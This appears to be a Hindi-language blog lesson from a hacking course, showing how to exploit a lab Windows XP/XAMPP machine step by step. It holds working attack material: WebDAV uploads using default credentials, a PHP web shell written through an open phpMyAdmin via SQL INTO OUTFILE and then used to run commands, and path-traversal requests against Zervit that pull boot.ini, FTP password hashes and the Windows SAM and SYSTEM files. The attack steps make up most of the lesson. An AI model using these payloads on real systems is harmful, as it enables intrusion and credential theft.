ATTACK : EXPLOITATION

हेल्लो दोस्तों,
हमे उम्मीद है की आपको हमारी इस Hacking Classes में बहुत अच्छा लग रहा होगा। अभी तक हमने बहुत सारी मेहनत करी है। अब हम अपना अगला Topic Exploitation करेंगे। जिसमे हम Exploits Run करेंगे Vulnerabilities के Against. कई Vulnerabilities, जैसे की Default username and Passwords Exploit करने में Easy होते है। Exploit करने के बाद हम अपने Target System को Access करने में Success हो जाते है। हमने अब तक जो भी Vulnerabilities Find की थी अब उनकी Help से Hack करेंगे तो आइये Friends Start करते है।


EXPLOITING WebDAV Default Credentials

आपको याद तो होगा ही की हमने XAMPP में Default Login Credentials Find किये थे Vulnerability Chapter में । इसमें हम सिर्फ कुछ Commands को Use करने अपनी Files को अपने Target System पर आसानी से Upload कर सकते है ।

Ok, सबसे पहले एक Test.txt File बनाइये और उसमे कुछ भी टाइप कर दे और Root पर ही सेव कर दे  और अब Terminal को Open करे Kali Linux में और अपनी फाइल के Contents देखने के लिए टाइप करे ।
cat test.txt

अब हम Cadaver इस्तेमाल करेंगे और Login Credentials username = wampp और password = xampp डालेंगे ये Default username and passwords होते है।
Terminal में Type करे
cadaver http://192.168.43.160/webdav

इसमें अब हम Type करेंगे  ।
put test.txt

अब अगर आप 192.168.43.160/webdav/test.txt को Browse करोगे तो आप देखोगे की हमने अपनी File को Successfully Upload कर दिया है । अब ये तो एक Simple File थी तो इसे अपलोड करने से कुछ नहीं होगा, ज्यादा हमारी Hacking को Success करने के लिए हमे PHP या ASP File को अपलोड करना होता है, जो हमे ज्यादा से ज्यादा Control दे सके।

>

तो अब हम एक php फाइल को अपलोड करने की कोशिश करेंगे। इस फाइल में मैंने कुछ php Code Type किया है जो बहुत ही Basic है।
अब कोई भी Text Editor Open करे और Type करे
<?php
echo “Hello World!”
?>

अब इसे भी अपलोड करे।
put test.php

अब जरा ध्यान दे की हमने एक php फाइल को अपलोड कर दिया है, लेकिन ये अभी सिर्फ Hello World! ही show कर रही है, लेकिन अगर आपको PHP की knowledge है तो आप सोच ही सकते हो की आप एक php फाइल को अपलोड करके क्या क्या कर सकते हो 🙂

EXPLOITATION OPEN phpMyAdmin

हमने पहले ही ये चेक किया था की जब हम http://192.168.43.160/phpmyadmin
को Open करते है तो हमे पूरा Admin Panel Open हो जाता है। तो अब इस Vulnerability को थोड़ा और Mis-use करते है, तो अब SQL Button पर क्लिक करे जो की Top पे दिया हुआ है, अब नीचे लिखी command को Type करे।
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\xampp\htdocs\shell.php”

अब इस Command को Execute करे और Browser को Open कर के टाइप करे
http://192.168.43.160/shell.php

अब आप देखेंगे की इसमें कुछ Error आ रही है :-
Warning: system() [function.system]: Cannot execute a blank command in C:
xampphtdocsshell.php on line 1, क्योकि हमने अभी कुछ भी Parameter Supply नहीं किया है, तो अब इसी में Type करे
http://192.168.43.160/shell.php?cmd=ipconfig

Woooo ये क्या आप अब us सिस्टम पर आपने ipconfig Command को Run किया है जिससे आपको उसके Windows IP Configuration के बारे में सारी Details मिल रही है। मजे के लिए आप और भी Comand Prompt की Commands Type कर सकते है 🙂

DOWNLOAD SENSITIVE FILES

अगर आपको याद हो तो जब हमे ये Classes में Lab Create की थी तब हमने Windows XP में Zervit नाम का Software भी Install किया था, अब उसे Start करे और वो ही जैसे पहले किया था,
PORT में 3232 डाल दे और Enter दबाये। अब Y दबाये और फिर से Enter दबाये।
अब Kali Linux में Browser पर URL Type करे
192.168.43.160:3232/?../../../../../../../boot.ini
अगर आपके System में कुछ भी Download या कोई Error जैसे की File not Found! दिखाए तो आप बारी बारी से यानी की पहले
192.168.43.160:3232/?../
192.168.43.160:3232/?../../
192.168.43.160:3232/?../../../
192.168.43.160:3232/?../../../

ये सब एक-एक करके आप Try कर सकते है, इससे आपके System पर एक File Download हो जायगी, हम इस File कर इस्तेमाल बाद में करेंगे अभी इसे बस Save कर ले।

DOWNLOADING CONFIGURATION FILE

XAMPP की Default Location C:/xampp होती है तो हम सोच सकते है की FileZilla FTP server C:/xampp/FileZillaFtp पर होगी तो अब हम FileZilla Server.xml File को डाउनलोड करेंगे जिसमे FTP का Password Store होता है लेकिन वो MD5 Hashes में होता है, अभी हम File को बस डाउनलोड करेंगे बाद में उसे Plain Text में Convert करेंगे। तो इसे डाउनलोड करने के लिए Browse करे :-
192.168.43.160:3232/?../../../../../../../xampp/FileZillaFTP/FileZilla%20Server.xml

इसमें %20 का मतलब सिर्फ एक Blank Space होता है और कुछ नहीं, अब अगर ये File किसी और Extension में हो तो आप उसे खुद ही .xml लगा दे और इसे Open करे आप देखोगे की इसमें दो User होंगे एक Target के नाम से और एक newuser के नाम से। और जो Option Name=”Pass”> में जो लिखा है वो इनका Password है, जिसे हम बाद में Decode करेंगे।

DOWNLAODING SAM FILE

सबसे पहले ये जाने की आखिर ये SAM File होती ही क्या है, तो दोस्तों ये फाइल Windows में होती है, जो की C:Windowssystem21config में मिलती है, वास्तव में इस File में Windows के Users के Passwords Save होते है, लेकिन वो भी Encrypted होते है, मतलब हम उन्हें ऐसे ही नहीं समझ सकते है, उन्हें भी Decode करना पड़ेगा, तो अब हम इस File को ही download करेंगे।
192.168.43.160:3232/?../../../../../../../WINDOWS/system32/config/sam

अगर हम अब ये Browse करे तो हमे एक Error आ जाता है, जिसमे File Not Found लिखा है, Actually इससे ये pta चलता है की Zervit को इस File को Access करने के Permission नहीं है, लेकिन Windows में एक और जगह है जहा पर Windows इस File का Backup Store रखती है,
C:windowsrepair Directory में अब हम वहा से इस File को Download करेंगे।
तो उसके लिए Browse करे :-
192.168.43.160:3232/?../../../../../../../WINDOWS/repair/system

उसके बाद इस फाइल को डाउनलोड कर ले अब दुबार Browse करे
192.168.43.160:3232/?../../../../../../../WINDOWS/repair/sam

और इसे भी डाउनलोड कर ले, देखा अब हमने कितने काम की Files को Download कर लिया है, हमने सीखा की हम कैसे Files को भी Upload कर सकते है ।
आगे हम आगे और भी बहुत कुछ सीखेंगे दोस्तों। हो सकता है की आप ये भी सोच रहे हो की ये तो आपने बता दिया की इनकी Vulnerability को कैसे use करेंगे लेकिन हमे कैसे पता चलेगा की इसे कैसे Use करना है, तो दोस्तों इसके 2 Solution है :-

  1. आप खुद ही Exploit करने में Expert हो जाओ। 
  2. अगर आप ये नहीं कर सकते तो जिस Software की Vulnerability आपको find करनी है उसे इस website पर Search जरूर करे http://www.exploit-db.com/ 

2 thoughts on “Attack : Exploitation

Leave a Reply

Your email address will not be published. Required fields are marked *